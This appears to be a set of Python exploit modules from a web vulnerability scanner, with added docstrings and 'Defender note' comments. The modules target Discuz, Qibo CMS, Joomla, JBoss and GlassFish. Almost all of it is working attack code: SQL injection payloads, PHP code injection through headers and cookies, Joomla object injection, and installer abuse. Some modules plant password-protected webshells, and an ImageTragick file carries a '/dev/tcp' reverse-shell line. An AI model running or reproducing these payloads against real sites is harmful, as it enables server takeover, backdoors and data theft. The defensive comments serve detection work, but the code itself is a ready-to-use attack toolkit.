    def _verify(self):
        """Check ``/search.php`` for an error-based SQL injection via ``selectsortid``.

        The crafted value embeds the marker ``sig`` so that a reflected database
        error can be told apart from an unrelated "SQL" string.  The result is
        only populated when both the marker and the word "SQL" appear in the
        response body; otherwise it is returned empty.

        Defender note: the observable indicator is a POST to /search.php whose
        ``selectsortid`` field contains SQL syntax (``where tid=(select ...``).
        """
        result = Result(self)

        # Marker value; its reflection inside an error message is the evidence.
        sig = '2c1743a391305fbf367df8e4f069f9f9'
        payload = {
            "formhash":
            "04949b0",
            "srchtxt":
            "aa",
            "srchtype":
            "threadsort",
            "st":
            "on",
            "sortid":
            "3",
            "selectsortid":
            "3 where tid=(select 1 from (select count(*),concat({0},floor(rand(0)*2))x from information_schema.tables group by x)a)#"
            .format(sig),
            "searchsubmit":
            "true"
        }

        url = self.urlJoin("/search.php")
        response = self.http.post(url, data=payload)

        if response.status_code == 200:
            # Both conditions are required; "SQL" alone is not treated as a hit.
            if sig in response.content and "SQL" in response.content:
                result['fullpath'] = response.request.body
                result['payload'] = response.request.body

        return result
    def _attack(self):
        """Exploit step for the installer at ``/install/index.php``.

        Requires two extra arguments, ``vulfile`` and ``vulpath``, read from
        ``self.elseArgs``; without them the result is flagged ``ERROR`` with an
        explanatory ``elseinfo`` message.  Three requests are issued, and the
        result's ``shellpath`` is set only if the final GET returns HTTP 200.

        Defender note: a reachable ``/install/index.php`` accepting ``step=11``
        after installation is the precondition; removing or locking the
        installer directory closes this path.
        """
        result = Result(self)

        vulfile = self.elseArgs.get("vulfile", None)
        vulpath = self.elseArgs.get("vulpath", None)

        if not vulfile or not vulpath:
            #print "Missing --elseargs, should be '--elseargs vulfile=shell.php#vulpath=http://aa.com'"
            result['isvul'] = result.ERROR
            result[
                'elseinfo'] = "Missing --elseargs, should be '--elseargs vulfile=shell.php#vulpath=http://aa.com'"
            return result

        # NOTE(review): self.params is shared instance state and is mutated in
        # place here; presumably it is reset between runs - confirm in the base class.
        self.params['step'] = "11"
        self.params['insLockfile'] = "a"
        self.params['s_lang'] = "a"
        self.params['install_demo_name'] = "../data/admin/config_update.php"

        url = self.urlJoin("/install/index.php")
        response1 = self.http.get(url, params=self.params)

        self.params['install_demo_name'] = vulfile
        self.params['updateHost'] = vulpath
        response2 = self.http.get(url, params=self.params)

        # response1/response2 are never inspected; only the final fetch decides.
        url = url.replace("index.php", vulfile)
        response3 = self.http.get(url)
        #print "debug>>>>>",response.request.url
        #print "debug>>>>>",response.content
        if response3.status_code == 200:
            result['shellpath'] = url

        return result
    def _info(self):
        """Write a text file with MVG-style drawing commands to ``else/vul.png``.

        Needs ``host`` and ``port`` in ``self.args``; otherwise the result is
        flagged ``ERROR`` with a message asking for them.  The generated content
        is stored in ``result['payload']`` and the file path in ``elseinfo``;
        nothing is sent over the network by this method.

        Defender note: the file is a plain-text script with a ``.png`` name, so
        upload handlers that validate image content (not just the extension)
        reject it.
        """
        result = Result(self)
        if "host" not in self.args or "port" not in self.args:
            result['isvul'] = result.ERROR
            result[
                'elseinfo'] = u"缺少参数host,port 请指定参数,例如--elseargs host=x.x.x.x#port=80"
            return result

        vulContent = (
            "push graphic-context\n"
            "viewbox 0 0 640 480\n"
            "fill 'url(https://example.com/image.jpg\"|bash -i >& /dev/tcp/host/port 0>&1\")'\n"
            "pop graphic-context")

        # Plain str.replace: every occurrence of the words "host"/"port" is
        # substituted, not only the ones inside the /dev/tcp path.
        vulContent = vulContent.replace('host', self.args['host'])
        vulContent = vulContent.replace('port', self.args['port'])

        # Written next to the running script (sys.path[0]), in text mode.
        vulImagePath = os.path.join(sys.path[0], "else", "vul.png")
        with open(vulImagePath, "w") as _file:
            _file.write(vulContent)

        result['isvul'] = result.INFO
        result['payload'] = vulContent
        result['elseinfo'] = u"已生成vul图片{0}, 将该图片上传到服务器,进行图片操作".format(
            vulImagePath)

        return result
    def _attack(self):
        """Two-step check via ``/search.php`` followed by ``/do/jf.php``.

        The first GET sends ``self.params`` (including the ``title`` value);
        the second POSTs ``alpha`` and looks for the marker ``sig`` in the
        response.  ``shellpath`` and ``vulinfo`` are set only on a match.

        Note that ``action`` is assigned twice; the later ``"addjf"`` value is
        the one actually sent.
        """
        result = Result(self)

        phpPayload = "${@assert($_POST[alpha])}"

        sig = '9876541'
        
        # NOTE(review): self.params is mutated in place (shared instance state).
        self.params['mid'] = "1"
        self.params['action'] = "search"
        self.params['keyword'] = "asd"
        self.params['postdb[city_id]'] = "../../admin/hack"
        self.params['hack'] = "jfadmin"
        self.params['action'] = "addjf"
        self.params['Apower[jfadmin_mod]'] = "1"
        self.params['fid'] = "1"
        self.params['title'] = phpPayload

        url = self.urlJoin("/search.php")
        response1 = self.http.get(url, params=self.params)

        # response1 is not inspected; only the second request decides.
        payload = {"alpha":"print {0};".format(sig)}
        url = url.replace("search.php","do/jf.php")
        response2 = self.http.post(url, data=payload)

        if response2.status_code == 200:
            if sig in response2.content:
                result['shellpath'] = self.baseURL+"/do/jf.php"
                result['vulinfo'] = "shell content: "+phpPayload

        return result
    def _verify(self):
        """Verify variant of the ``/search.php`` -> ``/do/jf.php`` check.

        Same request sequence as the attack variant, but on a match it records
        ``fullpath`` (``self.url``) and the POST ``payload`` instead of a shell
        path.  The marker ``sig`` must appear in the second response body.

        Defender note: the distinguishing indicator is a GET to /search.php with
        ``postdb[city_id]`` containing ``../`` and ``action=addjf``.
        """
        result = Result(self)

        phpPayload = "${@assert($_POST[alpha])}"
        #phpPayload = "${@fwrite(fopen('ali.php', 'w+'),'test')}"

        sig = '9876541'
        
        # NOTE(review): self.params is mutated in place (shared instance state).
        self.params['mid'] = "1"
        self.params['keyword'] = "asd"
        self.params['postdb[city_id]'] = "../../admin/hack"
        self.params['hack'] = "jfadmin"
        self.params['action'] = "addjf"
        self.params['Apower[jfadmin_mod]'] = "1"
        self.params['fid'] = "1"
        self.params['title'] = phpPayload

        url = self.urlJoin("/search.php")
        response1 = self.http.get(url, params=self.params)

        # response1 is not inspected; the second request carries the decision.
        payload = {"alpha":"print {0};".format(sig)}
        url = url.replace("search.php","do/jf.php")
        response2 = self.http.post(url, data=payload)

        if response2.status_code == 200:
            if sig in response2.content:
                result['fullpath'] = self.url
                result['payload'] = str(payload)

        return result
    def _info(self):
        """Return an informational result pointing at ``self.genBypassLink()``.

        No request is made here; the result is always ``INFO`` and ``elseinfo``
        carries the generated link for manual checking.
        """
        result = Result(self)

        result['isvul'] = result.INFO
        result['elseinfo'] = u"访问以下链接,查看是否可以下载附件:{0}".format(self.genBypassLink())

        return result
    def _verify(self):
        """Enumerate candidate backup paths and record those answering HTTP 200.

        Arguments are taken from ``self.args`` with defaults: ``type`` (only
        ``discuz``/``discuzx`` accepted, anything else falls back to ``discuz``),
        ``date``, ``days`` and ``dirs``; the last two are converted with ``int``
        and will raise ``ValueError`` on non-numeric input.  Paths come from
        ``self.genPath``; every live one is appended to ``vulinfo``.

        Defender note: this produces a burst of GETs for date-patterned paths;
        rate limiting and denying directory access to backup folders apply.
        """
        log = Log("exploit-discuz_brutefile")
        result = Result(self)

        dctype = self.args.get("type", "discuz").lower()
        if dctype not in ['discuz', 'discuzx']:
            dctype = "discuz"
        date = self.args.get("date", "15-01-01")
        days = self.args.get("days", "10")
        days = int(days)
        dirs = self.args.get("dirs", "1")
        dirs = int(dirs)

        # Use the site base when the target URL points at a .php page.
        url = self.baseURL if ".php" in self.url else self.url
        url = url.rstrip("/")
        alives = []
        for path in self.genPath(dctype, date, days, dirs):
            try:
                log.debug("request url {0}".format(url + path))
                response = self.http.get(url + path)
            except self.http.ConnectionError:
                pass

            # NOTE(review): if the request raised, `response` below is either
            # unassigned (first iteration) or stale from the previous path.
            if response.status_code == 200:
                log.debug("got alives {0}".format(url + path))
                alives.append(url + path)

        if alives:
            result['vulinfo'] = str(alives)

        return result
    def _info(self):
        """Build an informational note about the ``admin.php`` database-export URL.

        Nothing is requested; the method only composes a query string for
        ``admin.php`` (export of the ``pre_ucenter_admins`` table under the
        name ``filename``) and returns it inside ``elseinfo`` as an ``<img>``
        tag, with ``fullpath`` set to the admin URL.

        Defender note: the underlying weakness is an admin export action that
        can be triggered by an embedded image request (CSRF); a per-request
        token on the export form is the mitigation.
        """
        result = Result(self)

        url = self.urlJoin("admin.php")

        filename = "alpha"
        params = "?action=db&operation=export&setup=1&scrolltop=&anchor=&type=custom&customtables%5B%5D=pre_ucenter_admins&method=multivol&sizelimit=2048&extendins=0&sqlcompat=&usehex=1&usezip=0&filename={0}&exportsubmit=yes".format(filename)
        
        payload = "<img src='{0}'>".format(url+params)

        result['isvul'] = Result.INFO
        result['fullpath'] = url
        result['elseinfo'] = u"发帖,嵌入图片{0},\n如果目标服务器为windows:\ndiscuzX访问/data/backup~1/{1}-1.sql,\ndiscuz访问/forumdata/backup~1/{1}-1.sql,\n目标服务器为linux则需要爆破backup_xxxxxx目录".format(payload,filename)

        return result
    def _attack(self):
        """Check ``/inc/splitword.php`` for a pre-placed code-execution backdoor.

        POSTs a ``phpinfo();`` body under the fixed parameter name
        ``Y2hlbmdzaGlzLmMjd`` and looks for the ``_SERVER["HTTP_HOST"]`` string
        that phpinfo output contains.  On a match, ``fullpath`` and ``payload``
        are set; the file is not modified by this method.

        Defender note: a POST with that parameter name to /inc/splitword.php
        is a high-confidence indicator; the file itself should be inspected.
        """
        result = Result(self)

        phpPayload = "phpinfo();"
        sig = '_SERVER["HTTP_HOST"]'

        url = self.urlJoin("/inc/splitword.php")
        response = self.http.post(url, data={'Y2hlbmdzaGlzLmMjd': phpPayload})

        if response.status_code == 200:
            if sig in response.content:
                result['fullpath'] = url
                result['payload'] = "@eval($_POST['Y2hlbmdzaGlzLmMjd']);"

        return result
    def _verify(self):
        """Two-request check using a crafted ``User-Agent`` header.

        The first GET carries the output of ``self._genPayload`` in the
        User-Agent; the second plain GET is then searched for the fixed string
        ``asdfgh123456``.  ``fullpath``/``payload`` are set only when that
        string is echoed back.

        Defender note: the indicator is a User-Agent that does not look like a
        browser string followed by an immediate second request from the same
        client; the echo of the marker in a later page means the header was
        stored and evaluated.
        """
        result = Result(self)

        php_code = '''echo "asdfgh123456";'''
        # _genPayload is defined outside this block; its exact wrapping is not visible here.
        attack_payload = self._genPayload(php_code)

        response = self.http.get(self.url, headers={"User-Agent":attack_payload})

        if response.status_code == 200:
            # The marker is expected in a *subsequent* response, not the first one.
            response = self.http.get(self.url)
            if response.status_code == 200 and 'asdfgh123456' in response.content:
                result['fullpath'] = self.url
                result['payload'] = attack_payload

        return result
    def _verify(self):
        """Check ``/blog/ajax.php`` (``inc=edit_sort``) for SQL error reflection.

        Sends the marker ``sig`` as ``table_album``; a hit requires both the
        marker and the string ``doesn't exist`` in the response, i.e. the value
        was interpolated into a table name.  Note that ``payload`` is passed via
        ``params=`` on a POST, so it travels in the query string, not the body.
        """
        result = Result(self)

        sig = '2c1743a391305fbf367df8e4f069f9f9'
        params = "?inc=edit_sort&act=modify&name[]=yyy"
        payload = {"table_album": "{0}".format(sig)}

        url = self.urlJoin("/blog/ajax.php")
        # params= (not data=): table_album ends up in the URL alongside `params`.
        response = self.http.post(url + params, params=payload)

        if response.status_code == 200:
            if sig in response.content and "doesn't exist" in response.content:
                result['fullpath'] = url
                result['payload'] = response.request.url

        return result
    def _verify(self):
        """Check whether a crafted ``Cookie`` header reaches ``preg_replace``-style evaluation.

        The cookie sets two ``GLOBALS[_DCACHE][smilies]`` entries; if the
        response to a plain GET contains ``_SERVER["HTTP_HOST"]`` (phpinfo
        output), ``fullpath`` and the cookie string are recorded.

        Defender note: any request whose Cookie header contains ``GLOBALS[``
        is an indicator; such names should never be accepted from clients.
        """
        result = Result(self)

        sig = '_SERVER["HTTP_HOST"]'
        cookie = "GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();"
        headers = dict()
        headers['Cookie'] = cookie

        response = self.http.get(self.url, headers=headers)

        if response.status_code == 200:
            if sig in response.content:
                result['fullpath'] = self.url
                result['payload'] = 'Cookie: ' + cookie

        return result
    def _verify(self):
        """Check the ``tid`` parameter of ``self.baseURL`` for error-based SQL injection.

        Stores an ``extractvalue(...)`` expression carrying the marker ``sig`` in
        ``self.params['tid']`` and looks for the marker in the response body.
        Redirects are not followed, so only a direct 200 counts.
        """
        result = Result(self)

        sig = '5201314520'
        payload = "extractvalue(1,concat(0x5c,(select {0})))".format(sig)

        # NOTE(review): self.params is shared instance state mutated in place.
        self.params['tid'] = payload

        response = self.http.get(self.baseURL,
                                 params=self.params,
                                 allow_redirects=False)

        if response.status_code == 200:
            if sig in response.content:
                result['fullpath'] = self.url
                result['payload'] = payload

        return result
    def _verify(self):
        """Check ``/forum.php`` (``mod=attachment``) with a base64-encoded ``aid``.

        The marker ``sig`` is embedded in a UNION expression, base64-encoded and
        sent as ``aid``.  The match is performed against ``response.request.url``,
        not the response body, so a 200 status plus the marker being present in
        the (decoded) request URL is what sets the result.

        NOTE(review): because ``aid`` is base64-encoded, the raw marker appears
        in ``response.request.url`` only if the client or a redirect rewrote it -
        confirm this is the intended condition.
        """
        result = Result(self)

        sig = '2c1743a391305fbf367df8e4f069f9f9'
        payload = "1' and 1=2 union all select 1,'{0}".format(sig)
        self.params['mod'] = "attachment"
        self.params['findpost'] = "ss"
        self.params['aid'] = base64.b64encode(payload)

        url = self.urlJoin("/forum.php")
        response = self.http.get(url, params=self.params)

        if response.status_code == 200:
            if sig in response.request.url:
                result['fullpath'] = url
                result['payload'] = payload

        return result
    def _verify(self):
        """Check ``/shop.php`` (``ac=view``) for SQL error reflection via ``shopid``.

        The ``shopid`` value embeds the marker ``sig``; a 200 response whose body
        contains the marker sets ``fullpath`` and records the full request URL.
        """
        result = Result(self)

        sig = '2c1743a391305fbf367df8e4f069f9f9'
        payload = "1 and select 1 from (select concat_ws(':', left(rand(), 3), {0}), count(*) from information_schema.tables group by 1)a;".format(sig)

        # NOTE(review): self.params is shared instance state mutated in place.
        self.params['ac'] = 'view'
        self.params['shopid'] = payload

        url = self.urlJoin("/shop.php")
        response = self.http.get(url, params=self.params)

        if response.status_code == 200:
            if sig in response.content:
                result['fullpath'] = url
                result['payload'] = response.request.url

        return result
    def _verify(self):
        """Check whether ``/install/index.php`` is still reachable after installation.

        Requests the installer with ``step=11`` and a path-traversal
        ``install_demo_name``; the Chinese error text ``sig`` ("remote fetch
        failed") is searched in both GBK and UTF-8 encodings, since the page
        encoding is not known in advance.  A match records the URL and the
        parameters sent.

        Defender note: the fix is to remove the install directory (or the
        lock-file check that ``insLockfile`` bypasses) once setup is complete.
        """
        result = Result(self)

        sig = u"远程获取失败"
        
        # NOTE(review): self.params is shared instance state mutated in place.
        self.params['step'] = "11"
        self.params['insLockfile'] = "a"
        self.params['s_lang'] = "a"
        self.params['install_demo_name'] = "../data/admin/config_update.php"

        url = self.urlJoin("/install/index.php")
        response = self.http.get(url, params=self.params)

        if response.status_code == 200:
            # Body is compared as bytes; try both common encodings of the marker.
            if sig.encode('gbk') in response.content or sig.encode('utf-8') in response.content:
                result['fullpath'] = url
                result['payload'] = str(self.params)

        return result
    def _attack(self):
        """Attack variant of the ``/blog/ajax.php`` ``table_album`` injection.

        Uses ``uid`` from ``self.args`` (default ``"3"``) inside an UPDATE-style
        fragment sent via the query string (``params=`` on a POST).

        NOTE(review): ``sig`` is referenced in the match condition but is never
        defined in this method, so a 200 response raises ``NameError`` here
        instead of setting the result.
        """
        result = Result(self)

        uid = self.args.get("uid", "3")
        params = "?inc=edit_sort&act=modify&name[]=yyy"
        payload = {
            "table_album":
            "memberdata` set groupid=3 where uid={0}#".format(uid)
        }

        url = self.urlJoin("/blog/ajax.php")
        # params= (not data=): table_album is appended to the query string.
        response = self.http.post(url + params, params=payload)

        if response.status_code == 200:
            # `sig` is undefined in this scope (see docstring).
            if sig in response.content and "doesn't exist" in response.content:
                result['fullpath'] = url
                result['payload'] = response.request.url

        return result
    def _verify(self):
        """Probe four well-known JBoss management endpoints for exposure.

        Each path is requested without following redirects; a 200 *or* 500
        status is treated as "present" (500 still proves the servlet is mapped).
        Reachable endpoints are collected into ``vulinfo`` as a string.

        Defender note: these consoles should be removed or restricted to an
        administrative network; a redirect to a login page does not count as
        exposed here.
        """
        result = Result(self)

        vulpaths = {"jmx-console": "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo",
            "web-console"  : "/web-console/ServerInfo.jsp",
            "JMXInvokerServlet": "/invoker/JMXInvokerServlet",
            "admin-console" : "/admin-console/"}

        # Dict is a project-provided mapping type (not the builtin dict).
        matchs = Dict()
        for path in vulpaths:
            url = self.urlJoin(vulpaths[path])
            response = self.http.get(url, allow_redirects=False)    
            if response.status_code == 200 or response.status_code == 500:
                matchs[path] = url

        if matchs:
            result['vulinfo'] = str(matchs)

        return result
    def _verify(self):
        """Check the template editor reachable through ``/blog/ajax.php`` for code write.

        First GET writes ``payload`` into ``template/blue.htm`` via the
        ``maketpl`` action with a traversal ``moduleid``; second GET renders
        that template.  ``_SERVER["HTTP_HOST"]`` in the second response means
        the written PHP executed.  Only the second response is inspected.

        Defender note: this leaves a modified ``template/blue.htm`` on the
        target; integrity monitoring of the template directory detects it.
        """
        result = Result(self)

        sig = '_SERVER["HTTP_HOST"]'
        payload = "<?php phpinfo();?>"
        params = "?inc=ol_module&step=2&step=2&moduleid=../../../../hack/template/admin&action=maketpl&Apower[template_list]=1&postdb[filepath]=template/blue.htm&postdb[code]={0}".format(payload)

        url = self.urlJoin("/blog/ajax.php")
        response = self.http.get(url+params)

        params2 = "?inc=edit_sort&job=../../../../template/blue"
        response2 = self.http.get(url+params2)

        if response2.status_code == 200:
            if sig in response2.content:
                result['fullpath'] = url
                result['payload'] = payload

        return result
    def _verify(self):
        """Check for PHP-object injection through the ``User-Agent`` header.

        Sends a serialized ``JDatabaseDriverMysqli`` fragment in the User-Agent,
        then fetches the page again and looks for the literal string
        ``*****@*****.**`` in the second response.  The first ``attack_payload``
        assignment is immediately overwritten by the second (which uses the
        ``\\0`` escape form); only the second value is ever sent.

        Note the Python 2 ``print`` statement: the whole second response body is
        written to stdout on every run with a 200 first response.
        """
        result = Result(self)

        #php_code = '''echo "asdfgh123456";'''
        #attack_payload = self._genPayload(php_code)
        # Overwritten on the next line; kept here as-is.
        attack_payload = '''}__t|O:21:"JDatabaseDriverMysqli":2:{s:21:"\x5C0\x5C0\x5C0disconnectHandlers";a:1:{i:0;s:7:"print_r";}s:13:"\x5C0\x5C0\x5C0connection";i:1;}\xF0\x9D\x8C\x86'''
        attack_payload = '''}__t|O:21:"JDatabaseDriverMysqli":2:{s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;s:7:"print_r";}s:13:"\\0\\0\\0connection";i:1;}\xF0\x9D\x8C\x86'''
        response = self.http.get(self.url,
                                 headers={"User-Agent": attack_payload})
        #time.sleep(10)

        if response.status_code == 200:
            # Evidence is expected in a subsequent page load, not the first response.
            response = self.http.get(self.url)
            print response.content
            if response.status_code == 200 and '*****@*****.**' in response.content:
                result['fullpath'] = self.url
                result['payload'] = attack_payload

        return result
    def _verify(self):
        """Check whether a ``label[...]`` query key is written into a cache file and executed.

        The first GET to ``/index.php`` carries ``phpPayload`` inside the
        parameter *name*; the second GET fetches
        ``cache/label_cache/index_~1.php`` and looks for phpinfo output
        (``_SERVER["HTTP_HOST"]``).  A match records ``self.url`` and the
        payload string.

        Defender note: a request whose query-string *keys* contain ``${`` or
        quotes is the indicator; the cache directory should not be web-served.
        """
        result = Result(self)

        phpPayload = "@phpinfo()"
        params = "?label[a'.\"${%s}\".'][asd]=aaaa'" % phpPayload

        sig = '_SERVER["HTTP_HOST"]'

        url = self.urlJoin("/index.php")
        response = self.http.get(url + params)

        # Only the cached file is inspected; the first response is ignored.
        url2 = url.replace("index.php", "cache/label_cache/index_~1.php")
        response2 = self.http.get(url2)

        if response2.status_code == 200:
            if sig in response2.content:
                result['fullpath'] = self.url
                result['payload'] = str(phpPayload)

        return result
    def _verify(self):
        """Check ``/blog/member/update_sort.php`` for error-based SQL injection via ``type``.

        The ``type`` value embeds an ``updatexml(...)`` expression carrying the
        marker ``sig``; the marker reflected in a 200 response body sets
        ``fullpath`` and records the request URL.
        """
        result = Result(self)

        sig = '9876541'
        params = "?step=1"
        payload = {
            "type":
            "area where 1=(updatexml(1,concat(0x5e24,(select {0}),0x5e24),1))#"
            .format(sig)
        }

        url = self.urlJoin("/blog/member/update_sort.php")
        response = self.http.get(url + params, params=payload)

        if response.status_code == 200:
            if sig in response.content:
                result['fullpath'] = url
                result['payload'] = response.request.url

        return result
    def _attack(self):
        """Attack variant of the ``User-Agent`` injection: drops a file under ``/images/``.

        Wraps ``php_code`` with ``self._genPayload`` and sends it as the
        User-Agent; after a second page load, ``/images/parse.php`` is fetched
        and a 200 status alone is taken as success (the body is not checked).

        Defender note: a new ``parse.php`` appearing in the images directory,
        or a User-Agent containing ``fopen``/``fwrite``, is the indicator.
        """
        result = Result(self)
        #php_code = '''print "start-->|";echo __FILE__;'''
        #php_code = '''print "start-->|";echo getcwd();'''
        #php_code = '''$s='<?php @eval($_POST["pass"]);?>';$n=dirname(dirname(dirname(__FILE__)))."/images/parse.php";$f=fopen($n,"w");fwrite($f,$s);'''
        php_code = '''$s='<?php $f=strrev($_GET["f"]);$f($_POST["pass"]);?>';$n=dirname(dirname(dirname(__FILE__)))."/images/parse.php";$f=fopen($n,"w");fwrite($f,$s);'''
        attack_payload = self._genPayload(php_code)

        response = self.http.get(self.url, headers={"User-Agent":attack_payload})
        
        if response.status_code == 200:
            # Second load triggers the stored header; its response is discarded.
            response = self.http.get(self.url)
            response = self.http.get(self.urlJoin("/images/parse.php"))

            # Status-only check: any 200 here counts, even a default page.
            if response.status_code == 200:
                result['fullpath'] = self.url
                result['shellpath'] = "/images/parse.php?f=tressa"
                result['vulinfo'] = 'shell password: pass'

        return result
    def _verify(self):
        """Check ``/blog/ajax.php`` (``inc=ol_module``) for UNION-based SQL injection via ``pre``.

        The ``pre`` value embeds the marker ``sig`` in a UNION SELECT; the marker
        reflected in a 200 response body sets ``fullpath`` and records the
        request URL.  ``payload`` goes via ``params=`` and so into the query string.
        """
        result = Result(self)

        sig = '9876541'
        params = "?inc=ol_module&step=2&moduleid=../../../../do/js&&id=514125&webdb[web_open]=1&webdb[cache_time_js]=-1"
        payload = {
            "pre":
            "qb_label where lid=-1 UNION SELECT 1,2,3,4,5,6,0,{0},9,10,11,12,13,14,15,16,17,18,19#"
            .format(sig)
        }

        url = self.urlJoin("/blog/ajax.php")
        response = self.http.get(url + params, params=payload)

        if response.status_code == 200:
            if sig in response.content:
                result['fullpath'] = url
                result['payload'] = response.request.url

        return result
    def _attack(self):
        """Attack variant of the crawler-User-Agent access-control bypass check.

        Fetches ``self.url`` twice, once normally and once with a Baiduspider
        User-Agent.  If the login-required marker ``sig`` appears (in both GBK
        and UTF-8) in the plain response and in neither encoding in the spider
        response, the spider response is saved to ``result.html``.

        NOTE(review): the attribute is spelled ``conetnt`` on the write line,
        so the save raises ``AttributeError`` whenever the condition is met.
        The plain response is not status-checked before its body is searched.
        """
        result = Result(self)

        sig = u"才能浏览"
        userAgent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
        headers = {'User-Agent': userAgent}

        response = self.http.get(self.url)
        response2 = self.http.get(self.url, headers=headers)

        if response2.status_code == 200:
            if sig.encode("utf-8") in response.content and sig.encode(
                    "gbk") in response.content and sig.encode(
                        "utf-8") not in response2.content and sig.encode(
                            "gbk") not in response2.content:
                # Written to the current working directory in text mode.
                with open("result.html", "w") as fd:
                    fd.write(response2.conetnt)
                result['attachment'] = "result.html"

        return result
    def _verify(self):
        """Check whether a crawler User-Agent bypasses the "login to view" restriction.

        Fetches ``self.url`` twice, once normally and once with a Baiduspider
        User-Agent.  A hit requires the marker ``sig`` in *both* GBK and UTF-8
        form in the plain response and in *neither* form in the spider response.

        Defender note: the mitigation is to verify crawler identity by reverse
        DNS / IP range rather than by User-Agent string.
        """
        result = Result(self)

        sig = u"才能浏览"
        userAgent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
        #userAgent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://**.**.**.**/search/spider.html)"
        headers = {'User-Agent': userAgent}

        response = self.http.get(self.url)
        response2 = self.http.get(self.url, headers=headers)

        if response2.status_code == 200:
            # NOTE(review): requiring both encodings in the plain response is
            # unusual - a page normally uses one; confirm this is intended.
            if sig.encode("utf-8") in response.content and sig.encode(
                    "gbk") in response.content and sig.encode(
                        "utf-8") not in response2.content and sig.encode(
                            "gbk") not in response2.content:
                result['fullpath'] = self.url
                result['payload'] = userAgent

        return result
    def _attack(self):
        """Attack variant of the template-editor write through ``/blog/ajax.php``.

        Writes ``payload`` into ``template/green.htm`` via the ``maketpl``
        action, then fetches that file directly; if the raw source (marker
        ``strrev``) is returned, ``shellpath`` and ``vulinfo`` are set.

        Defender note: this leaves a modified ``template/green.htm`` on the
        target; integrity monitoring of the template directory detects it.
        """
        result = Result(self)

        sig = "strrev"
        payload = '<?php $f=strrev($_GET["f"]);$f($_POST["pass"]);?>'
        params = "?inc=ol_module&step=2&step=2&moduleid=../../../../hack/template/admin&action=maketpl&Apower[template_list]=1&postdb[filepath]=template/green.htm&postdb[code]={0}".format(
            payload)

        url = self.urlJoin("/blog/ajax.php")
        response = self.http.get(url + params)

        # The write response is ignored; the template file itself is checked.
        url2 = url.replace("/blog/ajax.php", "/template/green.htm")
        response2 = self.http.get(url2)

        if response2.status_code == 200:
            if sig in response2.content:
                result[
                    'shellpath'] = url + "?inc=edit_sort&job=../../../../template/green&f=tressa"
                result['vulinfo'] = "webshell password: pass"

        return result
    def _verify(self):
        """Check ``faq.php?action=grouppermission`` for error-based SQL injection via ``gids``.

        Posts two ``gids`` array entries, one of which embeds the marker ``sig``;
        a hit requires both the marker and the word "SQL" in the response body.
        ``self.url`` is used directly when it already points at ``faq.php``;
        otherwise the path is appended to ``self.baseURL``.
        """
        result = Result(self)

        sig = '2c1743a391305fbf367df8e4f069f9f9'
        payload = {
            "gids[66]":
            "'",
            "gids[88][0]":
            ") and (select 1 from (select count(*),concat({0},floor(rand(0)*2))x from information_schema.tables group by x)a)#"
            .format(sig)
        }

        url = self.url if "faq.php" in self.url else self.baseURL + "/faq.php?action=grouppermission"
        response = self.http.post(url, data=payload)

        if response.status_code == 200:
            if sig in response.content and "SQL" in response.content:
                result['fullpath'] = url
                result['payload'] = "Post:" + response.request.body

        return result
    def _verify(self):
        """Probe three overlong-UTF-8 path-traversal encodings for ``__admingui/WEB-INF/web.xml``.

        Each URL is built from ``self.protocol`` and ``self.host`` (the
        configured path is ignored) and fetched without following redirects.
        A 200 response containing ``<servlet-mapping>`` is recorded in
        ``vulinfo``.

        Defender note: the three variants differ only in how ``..`` is encoded;
        normalising the path before the traversal check is the mitigation.
        """
        result = Result(self)

        paths = [
            "/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/__admingui/WEB-INF/web.xml",
            "/theme/META-INF/%c0.%c0./%c0.%c0./__admingui/WEB-INF/web.xml",
            "/theme/META-INF/%E0%80%AE%E0%80%AE/%E0%80%AE%E0%80%AE/__admingui/WEB-INF/web.xml"
        ]

        signature = "<servlet-mapping>"
        matchs = []
        for path in paths:
            url = self.protocol + "://" + self.host + path

            response = self.http.get(url, allow_redirects=False)
            if response.status_code == 200:
                if signature in response.content:
                    matchs.append(url)

        if matchs:
            result['vulinfo'] = str(matchs)

        return result
    def _verify(self):
        """Check a fixed list of ``/data/backup/`` dump names for direct download.

        Each name in ``sqlList`` is appended to ``self.baseURL`` and fetched
        without following redirects; a 200 status alone is taken as a hit
        (the body is not inspected).  Live URLs are collected into ``vulinfo``.

        Defender note: the mitigation is to keep backups outside the web root
        or deny access to the backup directory at the web-server level.
        """
        log = Log("exploit_douphp_backupbrute")
        result = Result(self)

        sqlList = [
            'D20160~1.sql', 'D20150~1.sql', 'D20151~1.sql', 'D20140~1.sql',
            'D20141~1.sql', 'D20131~1.sql'
        ]

        vulURLs = []
        for sqlfile in sqlList:
            url = self.baseURL.rstrip("/") + "/data/backup/" + sqlfile

            log.debug("getting '{0}'".format(url))
            response = self.http.get(url, allow_redirects=False)

            # Status-only check; a soft-404 page answering 200 would be a false positive.
            if response.status_code == 200:
                log.debug("got alive'{0}'".format(url))
                vulURLs.append(url)

        if vulURLs:
            result['vulinfo'] = str(vulURLs)

        return result